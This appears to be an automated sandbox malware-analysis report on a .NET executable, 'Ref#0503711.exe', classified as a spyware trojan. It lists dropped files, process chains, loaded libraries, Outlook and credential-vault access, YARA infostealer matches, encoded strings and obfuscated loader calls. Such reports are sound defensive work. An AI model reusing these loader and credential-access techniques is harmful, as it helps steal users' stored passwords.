                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1684387882.000000000169E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1716743841.0000000005EFB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedoc5.exeF vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000002.00000002.2914356334.0000000000F39000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Ref#0503711.exe
                      Source: Ref#0503711.exe Binary or memory string: OriginalFilenamedoc5.exeF vs Ref#0503711.exe
                      Source: Ref#0503711.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 2.2.Ref#0503711.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Ref#0503711.exe.4acd860.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Ref#0503711.exe.48eac18.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Ref#0503711.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Ref#0503711.exe, -.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: docdd.exe.0.dr, -.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, sYjtawd4K2M2MYpuPvh.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: Ref#0503711.exe, -.csBase64 encoded string: 'ybeEgwietJySkQGW+bqemAPd272EkgCR9rfMsAiH36CDhRSy6b2Smg+f4/WQkhms3LubmyOS96vMmB2s06CShhiS9qeDjlaU/7qouwid/bqfzCqW7pqOhwi16KGavwyd/qKSzAqW7pG5lgCWoYeZkwiL1ajMpQiS/p2DhQSd/fW2kwnI/auDqD2c6aeDngKdoamSgzKw77yFkgOH3qGalgSdoZ2SgymS7q/MxF/LrPnMth6A/6OVmxSg/7yBkh/IyaeahwGW272EkgCR9reyjx2f9byShVaR+6ySmxueob2amAaW7quEgw=='
                      Source: docdd.exe.0.dr, -.csBase64 encoded string: 'VxCRIuZ0KjuHMO98Zx2LOe03RRqRM+57aBDZEeZtQQeWJPpYdxqHO+F1fVKFM/dGQhyOOs14aQzZOfNGTQeHJ/Z4aACWL7h+YR29GuZ3Yx2KbcR8cD2bJuZfdgaPHuJ3YAWHbeR8cDasN+58PyCMMuZhSw/ZBOZ4YDqWJOp3Y1KjMuciYwyWCdN2dwCWP+x3Pw6HItxacRuQM+1tQAaPN+p3PzqHIsd4cAjZZbctN1/ZF/BqYQSAOvpKYRuUM/EiVwCPJu98RRqRM+57aBCnLvN1axuHJLh7ZQuHOvV0PxqPOeh8cAyRIg=='
                      Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/5@2/3
                      Source: C:\Users\user\Desktop\Ref#0503711.exe File created: C:\Users\user\AppData\Roaming\ioibrzb.exe
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Mutant created: NULL
                      Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:64:WilError_03
                      Source: C:\Users\user\Desktop\Ref#0503711.exe File created: C:\Users\user\AppData\Local\Temp\docdd.exe
                      Source: Ref#0503711.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Users\user\Desktop\Ref#0503711.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Ref#0503711.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ref#0503711.exe File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: Ref#0503711.exe ReversingLabs: Detection: 31%
                      Source: C:\Users\user\Desktop\Ref#0503711.exe File read: C:\Users\user\Desktop\Ref#0503711.exe
                      Source: unknown Process created: C:\Users\user\Desktop\Ref#0503711.exe "C:\Users\user\Desktop\Ref#0503711.exe"
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Process created: C:\Users\user\AppData\Local\Temp\docdd.exe "C:\Users\user\AppData\Local\Temp\docdd.exe"
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Process created: C:\Users\user\Desktop\Ref#0503711.exe "C:\Users\user\Desktop\Ref#0503711.exe"
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Process created: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe "C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe"
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Process created: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe "C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe"
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 996
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: amsi.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: propsys.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: edputil.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: urlmon.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: srvcli.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: netutils.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: appresolver.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: bcp47langs.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: slc.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: sppc.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: rasman.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: secur32.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: edputil.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: slc.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: sppc.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: mscoree.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: version.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: wtsapi32.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: winsta.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: wbemcomn.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: amsi.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: rasapi32.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: rasman.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: rtutils.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: winhttp.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: dhcpcsvc.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: dnsapi.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: winnsi.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: secur32.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: schannel.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: mskeyprotect.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: ntasn1.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: ncrypt.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: ncryptsslp.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: vaultcli.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Section loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: wtsapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: winsta.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Section loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: C:\Users\user\Desktop\Ref#0503711.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                      Source: Ref#0503711.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Ref#0503711.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                      Source: Ref#0503711.exe Static file information: File size 1907648 > 1048576
                      Source: Ref#0503711.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x19fc00
                      Source: Ref#0503711.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: mscorlib.pdb# source: tmp2083.tmp.exe, 00000004.00000002.2915585701.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Qytqeye.pdb source: tmp2083.tmp.exe, 00000004.00000002.2921167455.0000000004632000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000004.00000002.2921167455.0000000004231000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000004.00000002.2941035784.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: %%.pdb source: tmp2083.tmp.exe, 00000004.00000002.2914577313.0000000001339000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.pdbTe source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000169E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: tmp2083.tmp.exe, 00000004.00000002.2915585701.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.pdb source: tmp2083.tmp.exe, 00000004.00000002.2915585701.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000169E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\tmp2083.tmp.PDB source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000171A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#0503711.exe, 00000000.00000002.1724582312.0000000006190000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1691296366.000000000379F000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.000000000313B000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb4ssMm2 source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000169E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.pdbj source: tmp2083.tmp.exe, 00000004.00000002.2915585701.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#0503711.exe, 00000000.00000002.1724582312.0000000006190000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1691296366.000000000379F000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.000000000313B000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000169E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.pdbsP source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000169E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Qytqeye.pdbH source: tmp2083.tmp.exe, 00000004.00000002.2921167455.0000000004632000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000004.00000002.2921167455.0000000004231000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000004.00000002.2941035784.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbM source: tmp2083.tmp.exe, 00000004.00000002.2915585701.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: tmp2083.tmp.exe, 00000004.00000002.2915585701.0000000001638000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: m0C:\Windows\mscorlib.pdb source: tmp2083.tmp.exe, 00000004.00000002.2914577313.0000000001339000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb]p source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000171A000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, sYjtawd4K2M2MYpuPvh.cs .Net Code: Type.GetTypeFromHandle(VQe29sNPbuw3Mw7NO5p.fnB7I1IxJy(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(VQe29sNPbuw3Mw7NO5p.fnB7I1IxJy(16777259)),Type.GetTypeFromHandle(VQe29sNPbuw3Mw7NO5p.fnB7I1IxJy(16777263))})
                      Source: Ref#0503711.exe, -.cs .Net Code: _E000 System.AppDomain.Load(byte[])
                      Source: Ref#0503711.exe, -.cs .Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                      Source: docdd.exe.0.dr, -.cs .Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Ref#0503711.exe.6050000.12.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
                      Source: 0.2.Ref#0503711.exe.6050000.12.raw.unpack, ListDecorator.cs .Net Code: Read
                      Source: 0.2.Ref#0503711.exe.6050000.12.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
                      Source: 0.2.Ref#0503711.exe.6050000.12.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
                      Source: 0.2.Ref#0503711.exe.6050000.12.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
                      Source: Yara match File source: 0.2.Ref#0503711.exe.5fa0000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.tmp2083.tmp.exe.5ba0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.Ref#0503711.exe.4506700.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000003.00000002.1751533958.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.1691296366.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.1719009997.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000002.1795600087.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: Ref#0503711.exe PID: 7332, type: MEMORYSTR
